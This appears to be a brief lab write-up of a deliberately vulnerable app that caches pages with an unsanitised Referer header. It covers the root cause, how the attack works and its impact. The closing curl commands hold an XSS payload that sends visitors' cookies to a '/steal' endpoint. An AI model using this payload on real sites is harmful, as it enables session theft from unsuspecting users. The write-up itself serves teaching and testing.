Skip to content

CachePoisoning

27-cache-poisoning-classic.py

Primary Vulnerability: Cache Poisoning via Referer Header

Root Cause:

The application caches responses that include the Referer header (user-controlled input) without proper sanitization

The cache key doesn't differentiate between different Referer headers, allowing poisoning

Exploitation Scenario:

  1. An attacker can send a request with a malicious Referer header

  2. The server caches this response with the malicious content

  3. Subsequent users receive the poisoned cached response

Impact:

  1. Stored XSS (if HTML/JS is injected via Referer)

  2. Defacement of the cached page

  3. Potential session hijacking if sensitive data is included

  4. Information disclosure (showing other users' Referer headers)

$ curl -H "Referer: <script>fetch('http://localhost/steal?cookie='+document.cookie)</script>" http://127.0.0.1:1337

# trigger the exploit
$ curl 127.0.0.1:1337

alt text

alt text